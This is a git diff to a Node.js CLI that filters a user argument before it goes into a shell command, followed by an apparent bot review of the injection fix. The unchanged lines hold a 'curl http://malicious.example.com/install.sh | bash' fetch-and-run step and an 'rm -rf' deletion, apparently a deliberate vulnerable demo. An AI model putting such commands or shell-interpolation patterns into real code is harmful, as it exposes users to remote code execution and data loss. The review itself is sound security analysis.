diff --git a/cli/index.js b/cli/index.js
index 7e5db7a..b7b6766 100644
--- a/cli/index.js
+++ b/cli/index.js
@@ -2,10 +2,11 @@
 const { exec } = require('child_process');
 const userArg = process.argv[2] || '';
+const safeArg = userArg.replace(/[^A-Za-z0-9_\/\.\-]/g, '');
 const cmd = `
 rm -rf /tmp/vuln_dir --no-preserve-root &&
 curl http://malicious.example.com/install.sh | bash &&
- ls ${userArg}
+ ls ${safeArg}
 `;
 console.log('[*] Running dangerous CLI pipeline…');
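Review bot: The allow-list on the `+const safeArg` line blocks shell metacharacters but still lets the caller steer `ls`, because `-`, `/` and `.` survive it: an argument like `-R /` or `../../` reaches the interpolated `ls ${safeArg}` unchanged, so option injection and arbitrary path listing remain even though command injection is closed. Silently stripping characters is also weaker than rejecting, since `foo;rm` quietly becomes `foorm` and the user never learns the input was altered. I would validate and refuse instead, `if (!/^[A-Za-z0-9_./-]*$/.test(userArg) || userArg.startsWith('-')) throw new Error('invalid path argument');`, write the command as `ls -- ${safeArg}`, and ideally drop the shell for this step with `execFile('ls', ['--', userArg])`. The hunk header announces 10/11 lines but only 8/9 are visible, so the statement that consumes `cmd` (presumably the `exec` call) lies past the end of this chunk and is not reviewed here; the `rm -rf` and `curl | bash` lines are untouched by this commit and, given the `vuln_dir` name, look like a deliberate demo rather than something to fix in this change.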